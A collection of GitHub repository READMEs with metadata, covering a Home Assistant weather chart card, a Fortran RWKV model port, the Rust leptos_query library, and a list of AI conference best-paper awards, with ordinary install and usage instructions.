<h1 align="center">Weather Chart Card</h1> [![Buy me a coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://www.buymeacoffee.com/mlamberts7I) [![hacs_badge](https://img.shields.io/badge/HACS-Custom-41BDF5.svg)](https://github.com/hacs/integration) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/mlamberts78/weather-chart-card?style=flat-square)](https://github.com/mlamberts78/weather-chart-card/releases/latest) ![GitHub downloads](https://img.shields.io/github/downloads/mlamberts78/weather-chart-card/total?style=flat-square) ![GitHub release (latest by SemVer including pre-releases)](https://img.shields.io/github/downloads/mlamberts78/weather-chart-card/latest/total) [![HACS Validate](https://github.com/mlamberts78/weather-chart-card/actions/workflows/validate.yaml/badge.svg)](https://github.com/mlamberts78/weather-chart-card/actions/workflows/validate.yaml) ![maintained](https://img.shields.io/maintenance/yes/2023.svg) ![weather-chart-card](https://github.com/mlamberts78/weather-chart-card/assets/93537082/0f000dcd-c469-4029-96f2-ece6ea11e47b) ## Installation ### HACS --Comming Soon!-- (recommended) This card is available in [HACS](https://hacs.xyz/) (Home Assistant Community Store). <small>_HACS is a third party community store and is not included in Home Assistant out of the box._</small> ### HACS Custom (recommended untill available in HACS default) 1. Go to any of the sections (integrations, frontend). 2. Click on the 3 dots in the top right corner. 3. Select "Custom repositories" 4. Add the URL to the repository: https://github.com/mlamberts78/weather-chart-card 5. Select the category "Lovelace". 6. Click the "ADD" button. ### Manual install 1. Download and copy `weather-chart-card.js` from the [latest release](https://github.com/mlamberts78/weather-chart-card/releases/latest) into your `config/www` directory. 2. Add the resource reference as decribed below. Add a reference to the copied file inside your `configuration.yaml` or in the Home Assistant UI: [![Open your Home Assistant instance and show your Lovelace resources.](https://my.home-assistant.io/badges/lovelace_resources.svg)](https://my.home-assistant.io/redirect/lovelace_resources/) ```yaml # Example Lovelace UI config entry resources: - type: module url: /local/weather-chart-card.js ``` Then you can add the card to the view: ```yaml # Example Lovelace UI config entry type: custom:weather-chart-card entity: weather.home ``` #### Configuration variables: ##### Card options | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | type | string | **Required** | Should be `custom:weather-chart-card`. | | entity | string | **Required** | An entity_id with the `weather` domain. | | temp | string | none | An entity_id for a custom temperature sensor. | | press | string | none | An entity_id for a custom pressure sensor. | | humid | string | none | An entity_id for a custom humidity sensor. | | uv | string | none | An entity_id for a custom UV index sensor. | | winddir | string | none | An entity_id for a custom wind bearing sensor. | | windspeed | string | none | An entity_id for a custom wind speed sensor. | | title | string | none | Card title. | | show_main | boolean | true | Show or hide a section with current weather condition and temperature. 
| | show_attributes | boolean | true | Show or hide a section with attributes such as pressure, humidity, wind direction and speed, etc. | | show_time | boolean | false | Show or hide the current time on the card. | | show_day | boolean | false | Show or hide the current day on the card. (Only visible when show_time is true.) | | show_date | boolean | false | Show or hide the current date the card. (Only visible when show_time is true.) | | show_humid | boolean | true | Show or hide humidity on the card. | | show_pressure | boolean | true | Show or hide pressure on the card. | | show_wind_direction | boolean | true | Show or hide wind_direction on the card. | | show_wind_speed | boolean | true | Show or hide wind_speed on the card. | | icons | string | none | Path to the location of custom icons in svg format, for example `/local/weather-icons/`. | | icons_size | number | 25 | The size of custom icons in pixels. | | forecast | object | none | See [forecast options](#forecast-options) for available options. | | units | object | none | See [units of measurement](#units-of-measurement) for available options. | ##### Forecast options | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | labels_font_size | string | 11 | Font size for temperature and precipitation labels. | | temperature1_color | string | rgba(255, 152, 0, 1.0) | Temperature first line chart color. | | temperature2_color | string | rgba(68, 115, 158, 1.0) | Temperature second line chart color. | | precipitation_color | string | rgba(132, 209, 253, 1.0) | Precipitation bar chart color. | | condition_icons | boolean | true | Show or hide forecast condition icons. | | show_wind_forecast | boolean | true | Show or hide wind forecast on the card. | | round_temp | boolean | false | Option for rounding the forecast temperatures | ##### Units of measurement | Name | Type | Default | Description | | -------------------- | ------- | -------------------------|--------------------------------------------------------------------------------------------------- | | pressure | string | none | Convert to 'hPa' or 'mmHg' or 'inHg' | | speed | string | none | Convert to 'km/h' or 'm/s' or 'Bft' or 'mph' | ###### What custom icons can I use? Icons should be in svg format. Icons should have names as shown [here](https://github.com/mlamberts78/weather-chart-card/blob/master/src/const.js#L24). 
Example: ![130360372-76d70c42-986c-46e3-b9b5-810f0317f94f](https://github.com/mlamberts78/weather-chart-card/assets/93537082/d3ee55a2-e64f-4354-b36d-9faf6ea37361) #### Example usage: ###### Card with current time, date and day ![Time](https://github.com/mlamberts78/weather-chart-card/assets/93537082/fa823cf1-aec7-41d7-9216-098fd6f8e388) ```yaml type: custom:weather-chart-card entity: weather.my_home show_time: true show_date: true show_date: true units: speed: Bft ``` ###### Chart only ![Chart-only](https://github.com/mlamberts78/weather-chart-card/assets/93537082/c99d85a4-30d1-4fd9-90ff-877421b39e9b) ```yaml type: custom:weather-chart-card entity: weather.my_home show_main: false show_attributes: false forecast: condition_icons: false show_wind_forecast: false ``` ###### Custom units ![Units](https://github.com/mlamberts78/weather-chart-card/assets/93537082/e72862ee-9bb7-4f97-9a3c-b17663c458aa) ```yaml type: custom:weather-chart-card entity: weather.my_home units: pressure: mmHg speed: m/s ``` ###### Supported languages: Czech <br /> Danish <br /> Dutch <br /> English <br /> Finnish <br /> French <br /> German <br /> Greek <br /> Hungarian <br /> Italian <br /> Norwegian <br /> Polish <br /> Portuguese <br /> Russian <br /> Spanish <br /> Swedish
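###### Custom forecast colors (illustrative)

As a further illustration of the forecast options table above, the snippet below customizes the chart colors and label size. The values are only illustrative and are not the card's defaults.

```yaml
type: custom:weather-chart-card
entity: weather.my_home
forecast:
  labels_font_size: '13'
  temperature1_color: rgba(230, 100, 100, 1.0)
  temperature2_color: rgba(68, 115, 158, 1.0)
  precipitation_color: rgba(132, 209, 253, 1.0)
  round_temp: true
```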
19
1
FortAI-Hub/rwkv.f90
https://github.com/FortAI-Hub/rwkv.f90
Port of the RWKV-LM model in Fortran (Back to the Future!)
# RWKV.f90

RWKV.f90 is a port of the original [RWKV-LM](https://github.com/BlinkDL/RWKV-LM), an open-source large language model initially developed in Python, into Fortran. Fortran is renowned for its robust capabilities in scientific and engineering computations, and the primary focus of this project is to explore its potential within the realm of Artificial Intelligence. Please note that this is an ongoing project and we welcome contributions.

# Prerequisites

Before you start, ensure that you have the following installed on your system:

- [cmake](https://cmake.org/download/)
- [gfortran](https://gcc.gnu.org/wiki/GFortranBinaries)
- [go](https://golang.org/dl/)

# Step-by-Step Guide

This section provides a detailed guide to setting up and running the RWKV.f90 project. The process includes downloading a model, moving the model to the correct directory, converting the model, building the project, and running it.

## 1. Downloading the Model

Download the `rwkv-4-world` model of your choice from the following options available at [huggingface.co](https://huggingface.co/BlinkDL/rwkv-4-world/tree/main):

- [0.1B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-0.1B-v1-20230520-ctx4096.pth)
- [0.4B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-0.4B-v1-20230529-ctx4096.pth)
- [1.5B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-1.5B-v1-fixed-20230612-ctx4096.pth)
- [3B](https://huggingface.co/BlinkDL/rwkv-4-world/resolve/main/RWKV-4-World-3B-v1-20230619-ctx4096.pth) - **Recommended** for a balance of performance and computational efficiency

Once you have downloaded your chosen model, move it to the 'models' directory in the project's root folder.

## 2. Model Conversion

After the desired model is in the correct location, convert it using the model converter. Make sure to adjust the filename according to the model you have downloaded. Run the following commands in your terminal:

```console
cd model_converter
go run model_converter.go ../models/<YOUR-MODEL-NAME>.pth
```

Replace `<YOUR-MODEL-NAME>` with the actual name of the downloaded model file.

## 3. Build the Project

With the model conversion done, you can now build the project. Navigate to the root directory of the project and run the following commands:

```console
mkdir build
cd build
cmake ..
make
```

### 3.1 Choosing a BLAS Implementation

The underlying BLAS (Basic Linear Algebra Subprograms) implementation that's used for matrix multiplication operations (`matmul`) can be chosen by providing the `-DBLAS_LIBRARY` flag during the CMake configuration step. Three options are available:

- `-DBLAS_LIBRARY=OpenBLAS`: This utilizes the OpenBLAS library, which is an open-source implementation of the BLAS API. Specify in `CMakeLists.txt` the directory where the OpenBLAS library is located.
- `-DBLAS_LIBRARY=Accelerate`: This leverages the Apple Accelerate Framework, which is highly optimized for Apple hardware.
- `-DBLAS_LIBRARY=Fortran` or leaving it unset: This defaults to Fortran's intrinsic `matmul` function, which allows the Fortran compiler to handle matrix operations without an external library.

To select an option, include the relevant flag when running `cmake`. For example, to use the OpenBLAS library, you would run:

```console
cmake -DBLAS_LIBRARY=OpenBLAS ..
```

By not specifying a `-DBLAS_LIBRARY` flag or setting it to `Fortran`, the build will rely on the intrinsic `matmul` function provided by the compiler (resulting in a slow execution).

## 4. Run the Project

Once the project is built, you can run it. The following command also colors stderr outputs in red for better error visibility. Adjust the command as necessary, according to your downloaded and converted model name:

```console
./rwkv ../models/rwkv_vocab_v20230424.csv ../models/<YOUR-CONVERTED-MODEL-NAME> 2> >(while read line; do echo -e "\e[01;31m$line\e[0m" >&2; done)
```

Replace `<YOUR-CONVERTED-MODEL-NAME>` with the name of your converted model file.

That's all! You have successfully set up and run the rwkv.f90 project. If you encounter any issues, please raise them in the issue tracker.

# References

The paper below provides more details about the RWKV concept and its applications. It's recommended reading for a better understanding of the project and its scientific background.

```bibtex
@misc{peng2023rwkv,
      title={RWKV: Reinventing RNNs for the Transformer Era},
      author={Bo Peng and Eric Alcaide and Quentin Anthony and Alon Albalak and Samuel Arcadinho and Huanqi Cao and Xin Cheng and Michael Chung and Matteo Grella and Kranthi Kiran GV and Xuzheng He and Haowen Hou and Przemyslaw Kazienko and Jan Kocon and Jiaming Kong and Bartlomiej Koptyra and Hayden Lau and Krishna Sri Ipsit Mantri and Ferdinand Mom and Atsushi Saito and Xiangru Tang and Bolun Wang and Johan S. Wind and Stanislaw Wozniak and Ruichong Zhang and Zhenyuan Zhang and Qihang Zhao and Peng Zhou and Jian Zhu and Rui-Jie Zhu},
      year={2023},
      eprint={2305.13048},
      archivePrefix={arXiv},
      primaryClass={cs.CL}
}
```
26
1
nicoburniske/leptos_query
https://github.com/nicoburniske/leptos_query
Asynchronous state management library for Leptos, providing simplified data fetching, integrated reactivity, server-side rendering support, and intelligent cache management.
# Leptos Query

[![Crates.io](https://img.shields.io/crates/v/leptos_query.svg)](https://crates.io/crates/leptos_query)
[![docs.rs](https://docs.rs/leptos_query/badge.svg)](https://docs.rs/leptos_query)

## About

Leptos Query is a robust asynchronous state management library for [Leptos](https://github.com/leptos-rs/leptos), providing simplified data fetching, integrated reactivity, server-side rendering support, and intelligent cache management.

Heavily inspired by [Tanstack Query](https://tanstack.com/query/latest/).

## Why Choose Leptos Query?

Leptos Query focuses on simplifying your data fetching process and keeping your application's state effortlessly synchronized and up-to-date. Here's how it's done:

### Key Features

- **Configurable Caching & SWR**: Queries are cached by default, ensuring quick access to your data. You can configure your stale and cache times per query with a Stale While Revalidate (SWR) system.
- **Reactivity at the Core**: Leptos Query deeply integrates with Leptos' reactive system to transform asynchronous query fetchers into reactive Signals.
- **Server-Side Rendering (SSR) Compatibility**: Fetch your queries on the server and smoothly serialize them to the client, just as you would with a Leptos Resource.
- **Efficient De-duplication**: No unnecessary fetches here! If you make multiple queries with the same Key, Leptos Query smartly fetches only once.
- **Manual Invalidation**: Control when your queries should be invalidated and refetched for that ultimate flexibility.
- **Scheduled Refetching**: Set up your queries to refetch on a customized schedule, keeping your data fresh as per your needs.
- **Manual Query Data Mutations**: Useful when you have updated a value and you want to manually set it in cache instead of waiting for the query to refetch.

## Installation

```bash
cargo add leptos_query --optional
```

Then add the relevant feature(s) to your `Cargo.toml`:

```toml
[features]
hydrate = [
    "leptos_query/hydrate",
    # ...
]
ssr = [
    "leptos_query/ssr",
    # ...
]
```

## Quick Start

In the root of your App, provide a query client:

```rust
use leptos_query::*;
use leptos::*;

#[component]
pub fn App(cx: Scope) -> impl IntoView {
    // Provides Query Client for entire app.
    provide_query_client(cx);

    // Rest of App...
}
```

Then make a query function.

```rust
use leptos::*;
use leptos_query::*;
use std::time::Duration;
use serde::*;

// Data type.
#[derive(Clone, Deserialize, Serialize)]
struct Monkey {
    name: String,
}

// Monkey fetcher.
async fn get_monkey(id: String) -> Monkey {
    todo!()
}

// Query for a Monkey.
fn use_monkey_query(cx: Scope, id: impl Fn() -> String + 'static) -> QueryResult<Monkey, impl RefetchFn> {
    leptos_query::use_query(
        cx,
        id,
        get_monkey,
        QueryOptions {
            default_value: None,
            refetch_interval: None,
            resource_option: ResourceOption::NonBlocking,
            // Considered stale after 10 seconds.
            stale_time: Some(Duration::from_secs(10)),
            // Infinite cache time.
            cache_time: None,
        },
    )
}
```

Now you can use the query in any component in your app.

```rust
#[component]
fn MonkeyView(cx: Scope, id: String) -> impl IntoView {
    let QueryResult {
        data,
        is_loading,
        is_fetching,
        is_stale,
        ..
    } = use_monkey_query(cx, move || id.clone());

    view! { cx,
        // You can use the query result data here.
        // Everything is reactive.
        <div>
            <div>
                <span>"Loading Status: "</span>
                <span>{move || { if is_loading.get() { "Loading..." } else { "Loaded" } }}</span>
            </div>
            <div>
                <span>"Fetching Status: "</span>
                <span>
                    {move || { if is_fetching.get() { "Fetching..." } else { "Idle" } }}
                </span>
            </div>
            <div>
                <span>"Stale Status: "</span>
                <span>
                    {move || { if is_stale.get() { "Stale" } else { "Fresh" } }}
                </span>
            </div>
            // Query data should be read inside a Transition/Suspense component.
            <Transition fallback=move || {
                view! { cx, <h2>"Loading..."</h2> }
            }>
                {move || {
                    data.get()
                        .map(|monkey| {
                            view! { cx, <h2>{monkey.name}</h2> }
                        })
                }}
            </Transition>
        </div>
    }
}
```

For a complete working example see [the example directory](/example).

## FAQ

### <ins>How's this different from a Leptos Resource?</ins>

A Query uses a resource under the hood, but provides additional functionality like caching, de-duplication, and invalidation.

Resources are individually bound to the `Scope` they are created in. Queries are all bound to the `QueryClient` they are created in. This means that once you have a `QueryClient` in your app, you can access the value for a query anywhere in your app. With a resource, you have to manually lift it to a higher scope if you want to preserve it, and this can be cumbersome if you have many resources.

Also, queries are stateful on a per-key basis, meaning you can use the same query with the same key in multiple places and only one request will be made, and they all share the same state.

### <ins>What's the difference between `stale_time` and `cache_time`?</ins>

`stale_time` is the duration until a query transitions from fresh to stale. As long as the query is fresh, data will always be read from the cache only. When a query is stale, it will be refetched on its next usage.

`cache_time` is the duration until inactive queries will be removed from cache.

- Default value for `stale_time` is 0 seconds.
- Default value for `cache_time` is 5 minutes.

These can be configured per-query using `QueryOptions`.

If you want infinite cache/stale time, you can set `stale_time` and `cache_time` to `None`.

> NOTE: `stale_time` can never be greater than `cache_time`. If `stale_time` is greater than `cache_time`, `stale_time` will be set to `cache_time`.

### <ins>What's a QueryClient?</ins>

A `QueryClient` allows you to interact with the query cache. You can invalidate queries, prefetch them, and introspect the query cache.

`use_query_client()` will return the `QueryClient` for the current scope.

### <ins>What does invalidating a query do?</ins>

Sometimes you can't wait for a query to become stale before you refetch it. `QueryClient` has an `invalidate_query` method that lets you intelligently mark queries as stale and potentially refetch them too! A minimal usage sketch is included at the end of this README.

When a query is invalidated, the following happens:

- It is marked as `invalid`. This `invalid` state overrides any `stale_time` configuration.
- The next time the query is used, it will be refetched in the background.
- If a query is currently being used, it will be refetched immediately.

### <ins>What's the difference between `is_loading` and `is_fetching`?</ins>

`is_fetching` is true when the query is in the process of fetching data.

`is_loading` is true when the query is in the process of fetching data FOR THE FIRST TIME.
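To make the invalidation FAQ above concrete, here is a minimal sketch of triggering a refetch from a button click. It builds on the `Monkey` query from the Quick Start section and assumes the `use_query_client()` and `invalidate_query` APIs described above; the component name, key type, and explicit type parameters are illustrative and may need adjusting to the exact crate version you use.

```rust
use leptos::*;
use leptos_query::*;

// Hypothetical component that forces a refresh of the Monkey query shown in
// the Quick Start section. Assumes `invalidate_query` accepts the query key;
// the turbofish form below is an assumption and may differ between versions.
#[component]
fn RefreshMonkey(cx: Scope, id: String) -> impl IntoView {
    // Grab the QueryClient provided at the root of the app.
    let client = use_query_client(cx);

    let on_click = move |_| {
        // Mark the query for this key as invalid; per the FAQ above, active
        // observers refetch immediately, inactive ones on their next use.
        client.invalidate_query::<String, Monkey>(id.clone());
    };

    view! { cx,
        <button on:click=on_click>"Refresh monkey"</button>
    }
}
```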
18
3
nowy/issues.fe.engineer
https://github.com/nowy/issues.fe.engineer
Issues for https://fe.engineer
# issues.fe.engineer Issues for https://fe.engineer
15
0
farzadhass/best-paper-and-high-citation
https://github.com/farzadhass/best-paper-and-high-citation
AI Best Paper Awards and High Citations
best paper conferences in AI [ICLR 2023](https://github.com/farzadhass/best-paper-and-high-citation#iclr-2023-kigali-rwanda-may-1-5-2023) [AAAI 2023](https://github.com/farzadhass/best-paper-and-high-citation/blob/main/README.md#aaai-2023---washington-dc-usa-february-7-14-2023) <picture> <source media="(prefers-color-scheme: dark)" srcset="https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png"> <source media="(prefers-color-scheme: light)" srcset="https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png"> <img alt="YOUR-ALT-TEXT" src="[YOUR-DEFAULT-IMAGE](https://prompthero.com/rails/active_storage/representations/proxy/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaEpJaWt3TlRNNE9UWTVOeTFpTlRZMUxUUTBOVFV0T0RRNU5TMWtabVkwTXpVNE0ySmhNRGdHT2daRlZBPT0iLCJleHAiOm51bGwsInB1ciI6ImJsb2JfaWQifX0=--73ae73cf7d1ade569f4528a8e66cddc5c579cd26/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaDdDRG9MWm05eWJXRjBPZ2wzWldKd09oUnlaWE5wZW1WZmRHOWZiR2x0YVhSYkIya0NBQWd3T2dwellYWmxjbnNKT2hOemRXSnpZVzF3YkdWZmJXOWtaVWtpQjI5dUJqb0dSVlE2Q25OMGNtbHdWRG9PYVc1MFpYSnNZV05sVkRvTWNYVmhiR2wwZVdsZiIsImV4cCI6bnVsbCwicHVyIjoidmFyaWF0aW9uIn19--935666d13f63ed5aca9daa2416340e3a90b6014e/prompthero-prompt-0b412088e35.png)"> </picture> # ICLR 2023 Kigali, Rwanda. May 1-5, 2023 **1**- [Universal Few-shot Learning of Dense Prediction Tasks with Visual Token Matching](https://arxiv.org/abs/2303.14969) [Donggyun Kim](https://scholar.google.com/citations?user=7KkA050AAAAJ&hl=en), [Jinwoo Kim](https://scholar.google.com/citations?user=kHuR_lEAAAAJ&hl=en), [Seongwoong Cho](https://seongwoongcho.github.io/), [Chong Luo](https://scholar.google.com/citations?user=01iBf38AAAAJ&hl=en), [Seunghoon Hong](https://scholar.google.com/citations?user=hvr3ALkAAAAJ&hl=en) **2**- [Rethinking the Expressive Power of GNNs via Graph Biconnectivity](https://arxiv.org/abs/2301.09505). [Bohang Zhang](https://scholar.google.com/citations?user=hJgT4tYAAAAJ&hl=en), [Shengjie Luo](https://scholar.google.com/citations?user=ImWO7WYAAAAJ&hl=zh-CN), [Liwei Wang](https://scholar.google.com/citations?user=VZHxoh8AAAAJ&hl=zh-CN), [Di He](https://scholar.google.co.jp/citations?user=orVoz4IAAAAJ&hl=en) **3**- [DreamFusion: Text-to-3D using 2D Diffusion](https://arxiv.org/abs/2209.14988) [Ben Poole](https://scholar.google.com/citations?user=i5FMLA4AAAAJ&hl=en), [Ajay Jain](https://scholar.google.ca/citations?user=Ih7iLuUAAAAJ&hl=en), [Jonathan T. 
Barron](https://scholar.google.com/citations?user=jktWnL8AAAAJ&hl=en), [Ben Mildenhall](https://scholar.google.com/citations?user=NozIDL8AAAAJ&hl=en) **4**- [Emergence of Maps in the Memories of Blind Navigation Agents](https://arxiv.org/abs/2301.13261) [Erik Wijmans](https://scholar.google.com/citations?user=9v86038AAAAJ&hl=en), [Manolis Savva](https://scholar.google.com/citations?user=4D2vsdYAAAAJ&hl=en), [Irfan Essa](https://scholar.google.com/citations?user=XM97iScAAAAJ&hl=en), [Stefan Lee](https://scholar.google.com/citations?user=8j3t5HsAAAAJ&hl=en), [Ari S. Morcos](https://scholar.google.com/citations?user=v-A_7UsAAAAJ&hl=en), [Dhruv Batra](https://scholar.google.com/citations?user=_bs7PqgAAAAJ&hl=en) # AAAI 2023 (Washington, DC, USA. February 7-14, 2023) **Outstanding Paper**: **1**- [Misspecification in Inverse Reinforcement Learning](https://arxiv.org/abs/2212.03201) [Joar Skalse](https://scholar.google.com/citations?user=GuzLUmQAAAAJ&hl=en), [Alessandro Abate](https://scholar.google.com/citations?user=yskbfM4AAAAJ&hl=en) __Outstanding Student Paper__: **2**- [Decorate the Newcomers: Visual Domain Prompt for Continual Test Time Adaptation](https://arxiv.org/abs/2212.04145) [Yulu Gan](https://scholar.google.com/citations?user=hQ-J_eAAAAAJ&hl=en), [Yan Bai](https://scholar.google.com/citations?hl=en&user=hR0hxdgAAAAJ&view_op=list_works&sortby=pubdate), [Yihang Lou](https://scholar.google.com/citations?user=xDTcPZIAAAAJ&hl=zh-CN), [Xianzheng Ma](https://scholar.google.com/citations?user=NS8g2mMAAAAJ&hl=en), [Renrui Zhang](https://scholar.google.com/citations?user=YlL3xN4AAAAJ&hl=zh-CN), Nian Shi, Lin Luo **Distinguished Paper**: **3**- [DropMessage: Unifying Random Dropping for Graph Neural Networks](https://arxiv.org/abs/2204.10037) [Taoran Fang](https://www.researchgate.net/profile/Taoran-Fang), Zhiqing Xiao, [Chunping Wang](https://scholar.google.com/citations?user=Rmy5RogAAAAJ&hl=zh-CN), [Jiarong Xu](https://galina0217.github.io/), [Xuan Yang](https://scholar.google.com/citations?user=HaA2AWIAAAAJ&hl=en), Yang Yang **4**- [Two Heads are Better than One: Image-Point Cloud Network for Depth-Based 3D Hand Pose Estimation](https://ojs.aaai.org/index.php/AAAI/article/download/25310/25082) [Pengfei Ren](https://scholar.google.com/citations?user=TzpecsAAAAAJ&hl=en), Yuchen Chen, [Jiachang Hao](https://scholar.google.com/citations?user=XRR603kAAAAJ&hl=zh-CN), [Haifeng Sun](https://scholar.google.com/citations?user=dwhbTsEAAAAJ&hl=en), Qi Qi, [Jingyu Wang](https://scholar.google.com/citations?user=H441DjwAAAAJ&hl=en), Jianxin Liao **5**- [Neural Architecture Search for Wide Spectrum Adversarial Robustness](https://ojs.aaai.org/index.php/AAAI/article/view/25118) Zhi Cheng, Yanxi Li, [Minjing Dong](https://scholar.google.com/citations?user=gJJRqlsAAAAJ&hl=zh-CN), [Xiu Su](https://scholar.google.com/citations?user=7OMxmYcAAAAJ&hl=zh-CN), [Shan You](https://scholar.google.com/citations?user=rFe-3twAAAAJ&hl=en), [Chang Xu](https://scholar.google.com/citations?user=N4F_3eoAAAAJ&hl=en) **6**- [CowClip: Reducing CTR Prediction Model Training Time from 12 hours to 10 minutes on 1 GPU](https://arxiv.org/abs/2204.06240) [Zangwei Zheng](https://scholar.google.com/citations?user=FTqutJEAAAAJ&hl=en), [Pengtai Xu](https://www.researchgate.net/profile/Pengtai-Xu), [Xuan Zou](https://scholar.google.com/citations?user=gSqwyvsAAAAJ&hl=en), [Da Tang](https://scholar.google.com/citations?user=00xg8JcAAAAJ&hl=en), Zhen Li, [Chenguang Xi](https://scholar.google.com/citations?user=AAGUBuIAAAAJ&hl=en), Peng Wu, 
Leqi Zou, Yijie Zhu, Ming Chen, Xiangzhuo Ding, [Fuzhao Xue](https://scholar.google.com/citations?user=JMHsqIkAAAAJ&hl=zh-CN), [Ziheng Qin](https://scholar.google.com/citations?hl=zh-CN&user=I04VhPMAAAAJ), [Youlong Cheng](https://scholar.google.com/citations?user=CSTk_LMAAAAJ&hl=en), [Yang You](https://scholar.google.com/citations?user=jF4dPZwAAAAJ&hl=zh-CN) **7**- [DICNet: Deep Instance-Level Contrastive Network for Double Incomplete Multi-View Multi-Label Classification](https://arxiv.org/abs/2303.08358) [Chengliang Liu](https://scholar.google.com.tw/citations?hl=zh-TW&user=ZfVmxqkAAAAJ), [Jie Wen](https://scholar.google.com.tw/citations?user=bsTnbo4AAAAJ&hl=zh-TW), [Xiaoling Luo](https://scholar.google.com.tw/citations?user=d-6X2kUAAAAJ&hl=zh-TW), [Chao Huang](https://scholar.google.com.tw/citations?user=T6yL8BUAAAAJ&hl=zh-TW), [Zhihao Wu](https://scholar.google.com.tw/citations?user=EnmDOYMAAAAJ&hl=zh-TW), [Yong Xu](https://scholar.google.com.tw/citations?user=zOVgYQYAAAAJ&hl=zh-TW) **8**- [Exploring Tuning Characteristics of Ventral Stream’s Neurons for Few-Shot Image Classification](https://ojs.aaai.org/index.php/AAAI/article/view/25128) Lintao Dong, Wei Zhai, [Zheng-Jun Zha](https://www.semanticscholar.org/author/Zhengjun-Zha/143962510) **9**- [MaskBooster: End-to-End Self-Training for Sparsely Supervised Instance Segmentation](https://ojs.aaai.org/index.php/AAAI/article/view/25481) Shida Zheng, Chenshu Chen, Xi Yang, Wenming Tan **10**- [SimFair: A Unified Framework for Fairness-Aware Multi-Label Classification](https://arxiv.org/abs/2302.09683) Tianci Liu, [Haoyu Wang](https://scholar.google.com/citations?user=5Lw9_jcAAAAJ&hl=zh-CN), [Yaqing Wang](https://scholar.google.com/citations?user=_Rfg2CAAAAAJ&hl=zh-CN), Xiaoqian Wang, [Lu Su](https://scholar.google.com/citations?user=38RuCN4AAAAJ&hl=zh-CN), [Jing Gao](https://scholar.google.com/citations?user=Ftj1h4cAAAAJ&hl=zh-CN) **11**- [XRand: Differentially Private Defense against Explanation-Guided Attacks](https://arxiv.org/abs/2212.04454) [Truc Nguyen](https://scholar.google.com.vn/citations?user=CoG--EkAAAAJ&hl=en), Phung Lai, [NhatHai Phan](https://scholar.google.com/citations?user=nsEbWjAAAAAJ&hl=en), [My T. Thai](https://scholar.google.com/citations?user=zLLJimcAAAAJ&hl=en) **12**- [Clustering What Matters: Optimal Approximation for Clustering with Outliers](https://arxiv.org/abs/2212.00696) [Akanksha Agrawal](https://scholar.google.com/citations?user=V_2z1BEAAAAJ), [Tanmay Inamdar](https://scholar.google.com/citations?user=hnelxH0AAAAJ), [Saket Saurabh](https://scholar.google.co.in/citations?user=76_9TI0AAAAJ&hl=en), [Jie Xue](https://scholar.google.com/citations?user=_ROFeyAAAAAJ) **13**- [Robust Average-Reward Markov Decision Processes](https://arxiv.org/abs/2301.00858) [Yue Wang](https://scholar.google.com/citations?user=v-AEFIEAAAAJ&hl=en), [Alvaro Velasquez](https://scholar.google.com/citations?user=1g3pA4cAAAAJ&hl=en), [George Atia](https://scholar.google.com/citations?user=E_8axWQAAAAJ&hl=en), [Ashley Prater-Bennette](https://scholar.google.com/citations?user=f1WPBE8AAAAJ&hl=en), [Shaofeng Zou](https://scholar.google.com/citations?user=abUmi6QAAAAJ&hl=en) **14**- [Efficient Answer Enumeration in Description Logics with Functional Roles](https://arxiv.org/abs/2211.15248) [Carsten Lutz](https://scholar.google.de/citations?user=xcsp66oAAAAJ&hl=en), [Marcin Przybylko](https://www.researchgate.net/profile/Marcin-Przybylko-2) # Edit # CoRL 2022 (Auckland, New Zealand. 
